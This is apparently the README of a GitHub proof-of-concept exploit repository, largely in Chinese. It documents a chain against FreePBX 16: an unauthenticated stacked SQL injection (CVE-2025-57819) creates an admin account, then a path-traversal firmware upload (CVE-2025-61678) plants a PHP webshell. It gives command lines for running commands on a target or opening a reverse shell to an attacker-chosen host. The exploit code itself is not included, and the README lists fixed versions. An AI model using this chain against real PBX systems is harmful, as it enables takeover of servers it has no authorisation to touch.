0xEhab/FreePBX-CVE-2025-57819-RCE

# FreePBX 16 — 未授权 SQLi 到 RCE 结合两个 FreePBX 漏洞的概念验证 exploit，实现从 **零权限** 到 在 FreePBX 16 上的 **远程代码执行**。 | CVE | 组件 | 影响 | |-----|-----------|--------| | **CVE-2025-57819** | Endpoint module loader (`brand` 参数) | 未授权堆叠 SQL injection | | **CVE-2025-61678** | Endpoint Manager 固件上传器 (`fwbrand` 参数) | 认证后任意文件上传（路径穿越） | ## 工作原理 1. **创建管理员 (CVE-2025-57819)** — 通过无需身份验证即可访问的 namespaced endpoint loader，利用堆叠 SQL injection 将一个全新的完整权限管理员直接 `INSERT`（插入）到 `ampusers` 表中。 2. **身份验证** — PoC 以新创建的用户身份登录到 admin panel。 3. **植入 webshell (CVE-2025-61678)** — 滥用 Endpoint Manager 固件上传处理程序，在 `fwbrand` 中使用 `../../../var/www/html/` 路径穿越，将 PHP webshell 写入 web 根目录。 4. **执行** — 运行单条命令或接收交互式 reverse shell。 ## 受影响版本 FreePBX 16（Endpoint 模块版本低于 `16.0.92`）。同时已在 `17.0.6` 中修复。 请更新至已修复版本。 ## 用法 ``` # 单条命令 python3 exploit.py --rhost pbx.example.com --command "id" # 交互式 reverse shell（通过 pwntools 自动监听） python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444 # 纯 HTTP / 自定义端口 python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a" ``` ### 选项 | Flag | 描述 | |------|-------------| | `--rhost` | 目标主机（必填） | | `--rport` | 目标端口（默认 `443`） | | `--http` | 使用 HTTP 而不是 HTTPS | | `--lhost` / `--lport` | Reverse shell 回调地址 | | `--command` | 运行单条命令而不是启动 shell | ## 环境要求 ``` pip install requests pwntools ``` ## 免责声明 仅供授权的安全测试和教育目的使用。仅在你拥有或获得明确书面许可的系统上使用。作者不对滥用行为承担任何责任。 ## 关键词 FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · 未授权 SQL injection · 堆叠查询注入 · endpoint module · Endpoint Manager · 认证后文件上传 · 路径穿越 · 远程代码执行 · RCE · PoC · exploit · VoIP 安全 linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb

标签：CISA项目, PoC, Web安全, 安全, 暴力破解, 蓝队分析, 超时处理, 逆向工具